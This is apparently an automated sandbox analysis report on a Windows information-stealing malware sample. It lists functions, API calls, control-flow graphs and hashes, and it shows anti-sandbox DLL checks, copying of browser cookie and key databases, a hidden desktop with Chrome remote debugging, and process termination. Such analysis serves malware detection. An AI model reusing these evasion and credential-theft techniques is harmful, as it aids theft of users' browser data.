                                                                                                                                                                                                                                                  • API ID: Internet$lstrcpylstrlen$CloseHandle$FileOpenReadlstrcat$ConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                  • String ID: "$------$build_id$hwid
                                                                                                                                                                                                                                                  • API String ID: 3613725345-50533134
                                                                                                                                                                                                                                                  • Opcode ID: a226ba48a9e1850e57829bd3354a094638608d2c18dede2ad7c7ec5fa795f12b
                                                                                                                                                                                                                                                  • Instruction ID: 0de5520962e200c6a25ed7e72827b66a405d0f47db110f2e63ec7661919d4967
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a226ba48a9e1850e57829bd3354a094638608d2c18dede2ad7c7ec5fa795f12b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8502C4B4A001185ADB06BF628C95AFF7BBBAB81B49F00401EF416672D1CF3C5A85CBD5
                                                                                                                                                                                                                                                  Function 00401325 Relevance: 25.6, APIs: 6, Strings: 11, Instructions: 104stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2480 401325-40133a GetPEB 2481 40133c-401340 2480->2481 2482 401342-40134e lstrcmpiW 2481->2482 2483 401355-401361 GetPEB 2481->2483 2482->2481 2484 401350 2482->2484 2485 401363-401367 2483->2485 2486 401454-401457 2484->2486 2487 401369-401375 lstrcmpiW 2485->2487 2488 40137c-401388 GetPEB 2485->2488 2487->2485 2489 401377 2487->2489 2490 40138a-40138e 2488->2490 2489->2486 2491 401390-40139c lstrcmpiW 2490->2491 2492 4013a3-4013af GetPEB 2490->2492 2491->2490 2493 40139e 2491->2493 2494 4013b1-4013b5 2492->2494 2493->2486 2495 4013b7-4013c3 lstrcmpiW 2494->2495 2496 4013ca-4013d6 GetPEB 2494->2496 2495->2494 2497 4013c5 2495->2497 2498 4013d8-4013dc 2496->2498 2497->2486 2499 4013ee-4013fa GetPEB 2498->2499 2500 4013de-4013ea lstrcmpiW 2498->2500 2502 4013fc-401400 2499->2502 2500->2498 2501 4013ec 2500->2501 2501->2486 2503 401412-40141e call 4012ed 2502->2503 2504 401402-40140e lstrcmpiW 2502->2504 2503->2486 2508 401420-40142c call 4012ed 2503->2508 2504->2502 2505 401410 2504->2505 2505->2486 2508->2486 2511 40142e-40143a call 4012ed 2508->2511 2511->2486 2514 40143c-401448 call 4012ed 2511->2514 2514->2486 2517 40144a-40144f call 4012ed 2514->2517 2517->2486
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,avghookx.dll), ref: 0040134A
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,avghooka.dll), ref: 00401371
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,snxhk.dll), ref: 00401398
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,sbiedll.dll), ref: 004013BF
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,api_log.dll), ref: 004013E6
                                                                                                                                                                                                                                                    • Part of subcall function 004012ED: lstrcmpiW.KERNEL32(?,?), ref: 00401313
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,dir_watch.dll), ref: 0040140A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                                                                                                                                  • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                                                                                                                                                                                                                                  • API String ID: 1586166983-3272603366
                                                                                                                                                                                                                                                  • Opcode ID: 2a1f5ce9f70cf23b1a530eb2306dab1fc1f0e01b606b30518bff8843f3dffdcc
                                                                                                                                                                                                                                                  • Instruction ID: 883fd4d78f60abfb3cb12b7bb653628bb47a760653f6edd6bf7d68e1fda7e1b2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a1f5ce9f70cf23b1a530eb2306dab1fc1f0e01b606b30518bff8843f3dffdcc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3531AD323013909BDB219B4AC9C0B517366AF44B647AA0073D902BB7B7E2B99C41CA1D
                                                                                                                                                                                                                                                  Function 0040CCF2 Relevance: 23.5, APIs: 9, Strings: 4, Instructions: 771fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2519 40ccf2-40cd29 call 41370e call 413806 2524 40cd42-40cd8b call 413860 call 4137c0 call 413770 * 2 call 41398e FindFirstFileA 2519->2524 2525 40cd2b-40cd3b 2519->2525 2536 40cd91-40cdbc call 41370e call 413806 2524->2536 2537 40d7ce-40d81c call 413770 * 8 2524->2537 2525->2524 2546 40cddc-40ce45 call 413860 call 4137c0 call 413770 * 2 call 41370e call 413860 call 413806 2536->2546 2547 40cdbe-40cdd5 2536->2547 2574 40ce57-40cef2 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 CopyFileA call 413740 call 40ae6d 2546->2574 2575 40ce47-40ce50 2546->2575 2547->2546 2602 40d008-40d026 2574->2602 2603 40cef8-40cf08 2574->2603 2575->2574 2604 40d029-40d030 2602->2604 2605 40cf1a-40cf53 call 413860 call 413806 2603->2605 2606 40cf0a-40cf13 2603->2606 2608 40d042-40d051 2604->2608 2609 40d032-40d03b 2604->2609 2617 40cf73-40d003 call 413860 call 413740 * 4 call 41797d call 413770 * 3 2605->2617 2618 40cf55-40cf6c 2605->2618 2606->2605 2614 40d057-40d05e 2608->2614 2615 40d79a-40d7ac FindNextFileA 2608->2615 2609->2608 2619 40d060-40d070 2614->2619 2620 40d077-40d086 2614->2620 2615->2604 2616 40d7b2-40d7c9 FindClose call 413770 * 2 2615->2616 2616->2537 2617->2602 2618->2617 2619->2620 2620->2615 2626 40d08c-40d0ae call 41370e call 413806 2620->2626 2637 40d0c0-40d10f call 413860 * 2 call 4137c0 call 413770 * 3 StrCmpCA 2626->2637 2638 40d0b0-40d0b9 2626->2638 2661 40d275-40d27b 2637->2661 2662 40d115-40d124 StrCmpCA 2637->2662 2638->2637 2663 40d281-40d2b9 call 41370e call 413860 call 413806 2661->2663 2664 40d6eb-40d6f2 2661->2664 2665 40d12a-40d139 StrCmpCA 2662->2665 2666 40d48c-40d492 2662->2666 2703 40d2cb-40d365 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 CopyFileA call 413740 call 40ae6d 2663->2703 2704 40d2bb-40d2c4 2663->2704 2671 40d790-40d795 call 413770 2664->2671 2672 40d6f8-40d783 call 413740 * 2 call 41370e call 413740 * 4 call 40ccf2 2664->2672 2669 40d5a0-40d5c8 call 413740 call 40ae6d 2665->2669 2670 40d13f-40d14e StrCmpCA 2665->2670 2666->2664 2667 40d498-40d4c0 call 413740 call 40ae6d 2666->2667 2695 40d6e5 2667->2695 2696 40d4c6-40d4d6 2667->2696 2669->2695 2699 40d5ce-40d5de 2669->2699 2670->2664 2675 40d154-40d15b 2670->2675 2671->2615 2761 40d788-40d78a 2672->2761 2675->2664 2681 40d161-40d180 call 413740 call 40ae6d 2675->2681 2705 40d185-40d189 2681->2705 2695->2664 2701 40d4e8-40d51b call 413860 call 413806 2696->2701 2702 40d4d8-40d4e1 2696->2702 2706 40d5f0-40d623 call 413860 call 413806 2699->2706 2707 40d5e0-40d5e9 2699->2707 2733 40d532-40d59b call 413860 call 413740 * 4 2701->2733 2734 40d51d-40d52b 2701->2734 2702->2701 2803 40d36a-40d36e 2703->2803 2704->2703 2705->2695 2712 40d18f-40d19f 2705->2712 2730 40d625-40d646 2706->2730 2731 40d64d-40d6b0 call 413860 call 413740 * 4 2706->2731 2707->2706 2717 40d1b1-40d1e4 call 413860 call 413806 2712->2717 2718 40d1a1-40d1aa 2712->2718 2743 40d1e6-40d200 2717->2743 2744 40d207-40d270 call 413860 call 413740 * 4 2717->2744 2718->2717 2730->2731 2782 40d6b6-40d6de call 41797d call 413770 * 2 2731->2782 2733->2782 2734->2733 2743->2744 2744->2782 2761->2671 2799 40d6e0 call 413770 2782->2799 2799->2695 2804 40d484-40d487 2803->2804 2805 40d374-40d384 2803->2805 2804->2799 2806 40d396-40d3cc call 413860 call 413806 2805->2806 2807 40d386-40d38f 2805->2807 2812 40d3ce-40d3e8 2806->2812 2813 40d3ef-40d47f call 413860 call 413740 * 4 call 41797d call 413770 * 3 2806->2813 2807->2806 2812->2813 2813->2804
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,00643AFF,?,?,0042EEFC), ref: 0040CD86
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CEC9
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?,?,?,?,00643A71,?,?,0042EEFC), ref: 0040D107
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040D11C
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040D131
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040D146
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85
                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,?), ref: 0040D7A4
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 0040D7B5
                                                                                                                                                                                                                                                    • Part of subcall function 0040CCF2: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D342
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$lstrcpy$Find$CloseCopyCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrlen
                                                                                                                                                                                                                                                  • String ID: \key4.db$_cookies.db$_history.db$_key4.db
                                                                                                                                                                                                                                                  • API String ID: 2673225304-3347733256
                                                                                                                                                                                                                                                  • Opcode ID: 6c6e51418689e5e4f928340cd0b68f4a3454b26266b9b7ff0646cc345c9108b6
                                                                                                                                                                                                                                                  • Instruction ID: 303406ac38d3177ba7cc7e5ed1d6b9532b3c71293ad990f1a43eb8195b1ed205
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c6e51418689e5e4f928340cd0b68f4a3454b26266b9b7ff0646cc345c9108b6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B62D8B5D002589BCF01EF65C881AED77B6FF55308F00915EE8156B292DB38ABC9CB94
                                                                                                                                                                                                                                                  Function 0040AB8F Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 191stringsleepprocessCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2831 40ab8f-40abb8 memset 2832 40abd1-40abdd 2831->2832 2833 40abba-40abca 2831->2833 2834 40abfb-40ac20 OpenDesktopA 2832->2834 2835 40abdf-40abf4 2832->2835 2833->2832 2837 40ac42-40ac7b memset lstrcatA * 2 2834->2837 2838 40ac22-40ac3c CreateDesktopA 2834->2838 2835->2834 2839 40ac8d-40accd memset call 414ae0 call 41398e 2837->2839 2840 40ac7d-40ac86 2837->2840 2838->2837 2846 40acf0-40ad7c call 414e77 lstrcpyA call 413770 call 4152a5 CreateProcessA 2839->2846 2847 40accf-40ace9 2839->2847 2840->2839 2854 40ad82-40ae33 Sleep call 413740 * 4 call 40a7c1 call 415342 2846->2854 2855 40ae38-40ae6a CloseDesktop call 413770 * 4 2846->2855 2847->2846 2854->2855
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040ABA9
                                                                                                                                                                                                                                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 0040AC18
                                                                                                                                                                                                                                                  • CreateDesktopA.USER32 ref: 0040AC3C
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040AC53
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040AC5F
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040AC69
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040ACA3
                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 0040AD04
                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32 ref: 0040AD74
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 0040AD87
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 0040A7C1: memset.MSVCRT ref: 0040A895
                                                                                                                                                                                                                                                    • Part of subcall function 0040A7C1: lstrcatA.KERNEL32(00000000,ws://localhost:9223,00000000,localhost,0042EEFC), ref: 0040A8FA
                                                                                                                                                                                                                                                    • Part of subcall function 0040A7C1: lstrcatA.KERNEL32(00000000,?), ref: 0040A90A
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415358
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: Process32First.KERNEL32(00000000,?), ref: 00415362
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: Process32Next.KERNEL32(00000000,?), ref: 0041536E
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00415392
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: TerminateProcess.KERNEL32(00000000,00000000), ref: 004153A1
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: CloseHandle.KERNEL32(00000000), ref: 004153A8
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: Process32Next.KERNEL32(00000000,?), ref: 004153B0
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: CloseHandle.KERNEL32(00000000), ref: 004153BB
                                                                                                                                                                                                                                                  • CloseDesktop.USER32(?), ref: 0040AE3B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcatmemset$CloseCreateDesktopProcessProcess32$HandleNextOpenlstrcpy$FirstSleepSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID: ChromeBuildTools$OCALAPPDATA
                                                                                                                                                                                                                                                  • API String ID: 1010841495-1746588603
                                                                                                                                                                                                                                                  • Opcode ID: 2f1e4990af193369e0fe23563a2b48ce88a4d32ec127e9fc2fdf05409dd7a9b3
                                                                                                                                                                                                                                                  • Instruction ID: ec91edd0ab285c5cc363a8a4a16679f2a80a84b4960ec0103b89f5f3963ca30b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f1e4990af193369e0fe23563a2b48ce88a4d32ec127e9fc2fdf05409dd7a9b3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C81E075C003499BDB01EF20DC467EABBB5BF55308F00921AF98876252EB74A7D8CB85
                                                                                                                                                                                                                                                  Function 00401825 Relevance: 20.0, APIs: 10, Strings: 1, Instructions: 775fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2875 401825-401857 call 41370e * 2 2880 401859-40185c 2875->2880 2881 40186c-401874 2875->2881 2882 401876-40187c 2880->2882 2883 40185e-401860 2880->2883 2884 40187e-4018a7 call 414ae0 call 413806 call 4137c0 call 413770 * 2 2881->2884 2882->2884 2885 401862-40186a 2883->2885 2886 4018ac-4018b3 2883->2886 2884->2886 2885->2884 2888 4018b9-4018d3 call 413806 2886->2888 2889 40196c-401986 call 413806 2886->2889 2897 4018e5-40190f call 413860 call 413806 2888->2897 2898 4018d5-4018de 2888->2898 2899 401998-401a03 call 413860 call 413806 call 413860 call 413806 call 4137c0 call 413770 * 4 2889->2899 2900 401988-401991 2889->2900 2914 401911-401922 2897->2914 2915 401929-401967 call 413860 call 4137c0 call 413770 * 3 2897->2915 2898->2897 2937 401a06-401a29 call 413770 call 41398e FindFirstFileA 2899->2937 2900->2899 2914->2915 2915->2937 2945 402237-40228c call 413770 * 9 2937->2945 2946 401a2f-401a4f 2937->2946 3000 402290-4022a0 call 413770 * 2 2945->3000 2948 401a52-401a59 2946->2948 2950 401a6b-401a80 2948->2950 2951 401a5b-401a64 2948->2951 2956 401a86-401a8d 2950->2956 2957 402207-402217 FindNextFileA 2950->2957 2951->2950 2959 401aa6-401abb 2956->2959 2960 401a8f-401a9f 2956->2960 2957->2948 2961 40221d-402232 FindClose call 41395a * 2 2957->2961 2959->2957 2969 401ac1-401ad7 call 41370e 2959->2969 2960->2959 2961->2945 2974 401eb1-401ec7 call 413806 2969->2974 2975 401add-401af6 call 413806 2969->2975 2986 401ed9-401f63 call 413860 call 413806 call 413860 * 2 call 4137c0 call 413770 * 5 call 413740 call 414ab3 2974->2986 2987 401ec9-401ed2 2974->2987 2984 401b08-401baf call 413860 call 413806 call 413860 * 3 call 413806 call 413770 * 6 call 41398e FindFirstFileA 2975->2984 2985 401af8-401b01 2975->2985 2984->3000 3052 401bb5 2984->3052 2985->2984 3044 401f69-401f8d call 41370e call 413860 2986->3044 3045 4021fc-402204 call 413770 2986->3045 2987->2986 3000->2945 3059 401f9f-402009 call 413860 call 413806 call 413860 call 4137c0 call 413770 * 4 3044->3059 3060 401f8f-401f98 3044->3060 3045->2957 3053 401bb8-401bbf 3052->3053 3055 401bd1-401c21 call 413860 * 2 call 4137c0 call 413770 * 2 call 413740 call 414ab3 3053->3055 3056 401bc1-401bca 3053->3056 3087 401e83-401e9b FindNextFileA 3055->3087 3088 401c27-401c51 call 41370e call 413860 3055->3088 3056->3055 3098 402023-40206d call 413860 call 4137c0 call 413770 call 41370e call 413860 call 413806 3059->3098 3099 40200b-40201e call 413860 call 4137c0 call 413770 3059->3099 3060->3059 3087->3053 3091 401ea1-401eac FindClose 3087->3091 3105 401c63-401da8 call 413860 call 413806 call 413860 call 4137c0 call 413770 * 4 call 413860 call 4137c0 call 413770 call 41370e call 413860 call 413806 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 CopyFileA call 413740 call 40ae6d 3088->3105 3106 401c53-401c5c 3088->3106 3094 4021f4-4021f9 call 413770 3091->3094 3094->3045 3131 40207f-40211e call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 CopyFileA call 413740 call 40ae6d 3098->3131 3132 40206f-402078 3098->3132 3099->3098 3228 401e46-401e7e call 41398e DeleteFileA call 41395a * 2 call 4147f4 call 413770 * 2 3105->3228 3229 401dae-401e41 call 413740 * 5 call 41797d call 413770 3105->3229 3106->3105 3186 402124-4021ba call 413740 * 5 call 41797d call 413770 3131->3186 3187 4021bf-4021f2 call 41398e DeleteFileA call 41395a * 2 call 4147f4 call 413770 3131->3187 3132->3131 3186->3187 3187->3094 3228->3087 3229->3228
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,00000028,00000028,00000028,?,?,004316B0,?,?,?,004316B0,?,?,00000028,00000028,?), ref: 00401A24
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,?,004316B0,?,?,?,004316B0,00000000,?,?,004316B0,?,?), ref: 00401BA7
